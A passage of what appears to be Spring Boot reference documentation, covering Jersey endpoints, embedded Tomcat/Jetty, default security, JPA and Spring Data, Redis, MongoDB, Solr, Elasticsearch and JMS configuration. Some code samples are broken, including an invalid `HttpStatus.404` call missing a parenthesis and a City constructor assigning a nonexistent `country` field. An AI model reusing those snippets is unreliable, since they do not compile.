JAX-RS programming model for REST endpoints you can use one of the\navailable implementations instead of Spring MVC. Jersey 1.x and Apache Celtix work\nquite well out of the box if you just register their `Servlet` or `Filter` as a\n`@Bean` in your application context. Jersey 2.x has some native Spring support so\nwe also provide autoconfiguration support for it in Spring Boot together with a\nstarter.\n\nTo get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a\ndependency and then you need one `@Bean` of type `ResourceConfig` in which you register\nall the endpoints:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t}\n\t}\n----\n\nAll the registered endpoints should be `@Components` with HTTP resource annotations\n(`@GET` etc.), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\t@Path(\"\/hello\")\n\tpublic class Endpoint {\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello\";\n\t\t}\n\n\t}\n----\n\nSince the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you\ncan `@Autowired` dependencies and inject external configuration with `@Value`. The Jersey\nservlet will be registered and mapped to '`\/\\*`' by default. You can change the mapping\nby adding `@ApplicationPath` to your `ResourceConfig`.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey[Jersey sample] so\nyou can see how to set things up. There is also a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey1[Jersey 1.x sample].\nNote that in the Jersey 1.x sample that the spring-boot maven plugin has been configured to\nunpack some Jersey jars so they can be scanned by the JAX-RS implementation (the sample\nasks for them to be scanned in its `Filter` registration.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat and Jetty servers. Most developers will\nsimply use the appropriate '`Starter POM`' to obtain a fully configured instance. By\ndefault both Tomcat and Jetty will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-and-filters]]\n==== Servlets and Filters\nWhen using an embedded servlet container you can register Servlets and Filters directly as\nSpring beans. This can be particularly convenient if you want to refer to a value from\nyour `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In\nthe case of multiple Servlets beans the bean name will be used as a path prefix. Filters\nwill map to `+\/*+`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control. You\ncan also register items directly if your bean implements the `ServletContextInitializer`\ninterface.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded\nservlet container support. The `EmbeddedWebApplicationContext` is a special\ntype of `WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`\nor `JettyEmbeddedServletContainerFactory` will have been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.sessionTimeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can register\na Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean\nyourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.404, \"\/notfound.html\");\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n'`hooks`' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so\nyou can see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith '`basic`' authentication on all HTTP endpoints. To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user ('`user`' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nYou can change the password by providing a `security.user.password`. This and other\nuseful properties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebConfigurerAdapter` (e.g. to\nadd form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`+\/css\/**+`, `+\/js\/**+`,\n `+\/images\/**+` and `+**\/favicon.ico+`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`+security.*+`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`+management.security.*+`). To override the application access rules\nadd a `@Bean` of type `WebConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete '`object relational mapping`'\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The '`How-to`' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs, simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation.\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If HikariCP is available we will use it\n* If Commons DBCP is available we will use it, but we don't recommend it in production.\n* Lastly, if Commons DBCP2 is available we will use it\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n'`starter POMs`' you will automcatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`+spring.datasource.*+`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nTIP: You often won't need to specify the `driver-class-name` since Spring boot can deduce\nit for most databases from the `url`.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n\n\n[[boot-features-connecting-to-a-jndi-datasource]]\n==== Connection to a JNDI DataSource\nIf you are deploying your Spring Boot application to an Application Server you might want\nto configure and manage your DataSource using you Application Servers built in features\nand access it using JNDI.\n\nThe `spring.datasource.jndi-name` property can be used as an alternative to the\n`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`\nproperties to access the `DataSource` from a specific JNDI location. For example, the\nfollowing section in `application.properties` shows how you can access a JBoss AS defined\n`DataSource`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and '`Spring Data`'\nThe Java Persistence API is a standard technology that allows you to '`map`' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to easily implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/['`Accessing Data with JPA`'] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead '`Entity Scanning`' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default JPA database will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`+spring.jpa.*+` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them\nto the entity manager). Example:\n\n[indent=0]\n----\n\tspring.jpa.properties.hibernate.globally_quoted_identifiers=true\n----\n\npasses `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.\n\nBy default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate autoconfig is active because the `ddl-auto`\nsettings are more fine grained.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n'`redisTemplate`' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the The\n`spring-boot-starter-data-mongodb` '`Starter POM`'.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the `url`, or alternatively\nspecify a `host`\/`port`. For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate` Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` '`Starter POM`'\nfor collecting the dependencies in a convenient way. There is currently no auto=config\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elastic Search] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring Websocket and Spring Boot has support for that through starters and a small\namount of auto configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to\nconnect to a broker using the the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: if you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can chose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an Application Server Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative 